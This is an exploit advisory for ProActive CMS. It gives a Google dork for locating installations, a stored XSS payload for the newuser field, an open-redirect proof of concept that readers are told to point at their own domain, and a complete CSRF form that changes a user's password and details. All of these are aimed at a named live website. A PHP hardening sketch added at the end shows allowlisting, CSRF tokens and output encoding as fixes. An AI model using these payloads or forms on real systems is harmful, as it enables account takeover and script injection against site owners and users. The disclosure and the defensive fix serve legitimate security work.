# Exploit Title: ProActive CMS Multiple Vulnerabilities
# Google Dork: intext:"Powered by Proactive CMS"
# Exploit Author: Rafay Baloch
# Vendor Homepage: http://www.proactivecms.com
# Tested on: Linux
Stored Cross Site Scripting:
http://professional.inbusiness.com.au/admin.php?action=newuser
Insert Your Payload:
"><img src=x onerror=prompt(0);>
The newuser field does not properly sanitize the input, resulting in a stored XSS.
An open redirect issue was also found:
POC:
http://professional.inbusiness.com.au/admin.php?action=http://rafayhackingarticles.net
Just replace http://rafayhackingarticles.net with your own domain.
Missing CSRF Tokens:
Most of the forms are missing CSRF tokens; to be honest, it is one of the most insecure CMSs I have ever seen.
http://professional.inbusiness.com.au/admin.php?action=edituser&id=24
The following PoC could be altered to change a user's details.
<html>
<body>
<form action="http://professional.inbusiness.com.au/admin.php?action=saveuser&id=24" method="POST">
<input type="hidden" name="groupreadvalue" value="" />
<input type="hidden" name="groupreadallvalue" value="" />
<input type="hidden" name="id" value="24" />
<input type="hidden" name="password1" value="tony123" />
<input type="hidden" name="firstname" value="Tony" />
<input type="hidden" name="description" value="" />
<input type="hidden" name="initials" value="V" />
<input type="hidden" name="description" value="" />
<input type="hidden" name="lastname" value="Badger" />
<input type="hidden" name="description" value="" />
<input type="hidden" name="title" value="" />
<input type="hidden" name="description" value="" />
<input type="hidden" name="dob" value="" />
<input type="hidden" name="description" value="" />
<input type="hidden" name="email" value="tony.badger@sales.fake.com" />
<input type="hidden" name="description" value="" />
<input type="hidden" name="telephone" value="+13" />
<input type="hidden" name="description" value="" />
<input type="hidden" name="mobile" value="" />
<input type="hidden" name="description" value="" />
<input type="hidden" name="fax" value="" />
<input type="hidden" name="description" value="" />
<input type="hidden" name="url" value="" />
<input type="hidden" name="description" value="" />
<input type="hidden" name="address" value="" />
<input type="hidden" name="description" value="" />
<input type="hidden" name="suburb" value="" />
<input type="hidden" name="description" value="" />
<input type="hidden" name="postcode" value="" />
<input type="hidden" name="description" value="" />
<input type="hidden" name="state" value="" />
<input type="hidden" name="description" value="" />
<input type="hidden" name="country" value="" />
<input type="hidden" name="description" value="" />
<input type="hidden" name="business_name" value="" />
<input type="hidden" name="description" value="" />
<input type="hidden" name="division" value="" />
<input type="hidden" name="description" value="" />
<input type="hidden" name="position" value="" />
<input type="hidden" name="description" value="" />
<input type="hidden" name="building" value="" />
<input type="hidden" name="description" value="" />
<input type="hidden" name="x" value="30" />
<input type="hidden" name="y" value="10" />
<input type="hidden" name="groupReadList" value=",Sales" />
<input type="submit" value="Submit form" />
</form>
</body>
</html>
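A defensive counterpart to the three findings above, added here as an example and not code from ProActive CMS: it shows how admin.php could allowlist the action parameter (closing the open redirect), require a per-session CSRF token on saveuser (so the form PoC above is rejected), and HTML-encode the stored newuser value on output (neutralizing the stored XSS). Function and field names are assumptions.

```php
<?php
// Added hardening sketch, not ProActive CMS code: an allowlist for the
// admin.php "action" dispatcher, a per-session CSRF token for state-changing
// requests, and output encoding for stored user fields. Names are assumed.
declare(strict_types=1);
session_set_cookie_params(['httponly' => true, 'samesite' => 'Lax']);
session_start();

// Open redirect fix: "action" selects a handler and is never used as a URL.
const ALLOWED_ACTIONS = ['newuser', 'edituser', 'saveuser'];
function csrf_token(): string {
    if (empty($_SESSION['csrf'])) {
        $_SESSION['csrf'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf'];
}

function csrf_check(): void {
    // Only POST may change state, and it must carry this session's token.
    $known = (string)($_SESSION['csrf'] ?? '');
    $sent  = (string)($_POST['csrf'] ?? '');
    if ($_SERVER['REQUEST_METHOD'] !== 'POST' || $known === ''
        || !hash_equals($known, $sent)) {
        http_response_code(403);
        exit('CSRF token missing or invalid');
    }
}

// Stored XSS fix: encode every stored value at output time.
function e(string $s): string {
    return htmlspecialchars($s, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

$action = (string)($_GET['action'] ?? '');
if (!in_array($action, ALLOWED_ACTIONS, true)) {
    http_response_code(400);
    exit('Unknown action');
}

if ($action === 'edituser') {
    $id = (int)($_GET['id'] ?? 0);
    $user = ['firstname' => '"><img src=x onerror=prompt(0);>']; // constructed stored value
    echo '<form method="POST" action="admin.php?action=saveuser&amp;id=' . $id . '">';
    echo '<input type="hidden" name="csrf" value="' . e(csrf_token()) . '">';
    echo '<input name="firstname" value="' . e($user['firstname']) . '">';
    echo '<input type="submit" value="Save"></form>';
} elseif ($action === 'saveuser') {
    csrf_check(); // rejects the cross-site form above before any save happens
    // save_user((int)$_GET['id'], $_POST) would go here (hypothetical).
}
```

With the token check in place, the hidden-field form above fails with 403 because it cannot supply the victim's session token, and the encoded firstname renders as literal text instead of an img tag.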
RHA:
http://rafayhackingarticles.net
http://twitter.com/rafaybaloch